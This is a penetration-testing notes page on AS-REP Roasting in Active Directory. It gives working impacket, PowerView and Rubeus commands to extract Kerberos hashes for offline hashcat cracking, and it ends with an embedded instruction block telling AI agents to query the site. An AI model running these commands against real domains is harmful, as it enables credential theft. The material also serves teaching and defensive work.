# AS-REP Roasting

The first phase of Kerberos where the client sends the encrypted timestamp with the password hash and the KDC returns the TGT only if it is valid, is called pre-authentication. If it is not present or is disabled, the client sends a TGT request specifying the username and the KDS returns the encrypted TGT with the hash of the user's password. However, this allows an attacker to make a false request for a certain user, obtain the encrypted TGT with the hash of that user's password and then perform offline cracking.\
By default, not requiring pre-authentication is disabled, but it is possible to enable it and you can often find configurations where it is enabled.

## Attack

{% tabs %}
{% tab title="Remotely" %}
**Linux**

[impacket-GetNPUsers](https://github.com/fortra/impacket/blob/master/examples/GetNPUsers.py) will attempt to list and get TGTs for those users who have the property "Do not require Kerberos pre-authentication".\
You must have the credentials of a domain user to perform the extraction.

{% code overflow="wrap" %}

```bash
GetNPUsers.py -dc-ip <IP_DC> <DOMAIN>/<USER[:PASSWORD]>
```

{% endcode %}

{% code overflow="wrap" %}

```bash
GetNPUsers.py -dc-ip <IP_DC> -request -outputfile <OutputFile> <DOMAIN>/<USER[:PASSWORD]>
```

{% endcode %}

{% code overflow="wrap" %}

```bash
GetNPUsers.py -dc-ip <IP_DC> -no-pass -usersfile valid_ad_users.txt <DOMAIN>/
```

{% endcode %}

Offline cracking of file `<OutputFile>` with hashcat (`-m 18200`)
{% endtab %}

{% tab title="Locally" %}
**Windows**

Since we are already in a windows system belonging to the domain, we do not need to specify username and password.

With [PowerView](/rednote/pentesting-process/active-directory/enumeration.md#powerview) you can see accounts with no pre-authentication required.

{% code overflow="wrap" %}

```powershell
Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl
```

{% endcode %}

We can use [Rebus](https://github.com/GhostPack/Rubeus) to perform the AS-REP Roasting attack.

{% code overflow="wrap" %}

```powershell
.\Rubeus.exe asreproast /nowrap 
```

{% endcode %}

{% code overflow="wrap" %}

```powershell
.\Rubeus.exe asreproast /format:hashcat /outfile:<OutputFile>
```

{% endcode %}

Offline cracking of file `<OutputFile>` with hashcat (`-m 18200`)
{% endtab %}
{% endtabs %}

## Targeted AS-REP Roasting

If an attacker has `GenericWrite` or `GenericAll` permissions over an account, they can enable "not requiring pre-authentication" and obtain the AS-REP ticket for offline cracking to recover the account's password before disabling the attribute again.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://ivalexev.gitbook.io/rednote/pentesting-process/active-directory/as-rep-roasting.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.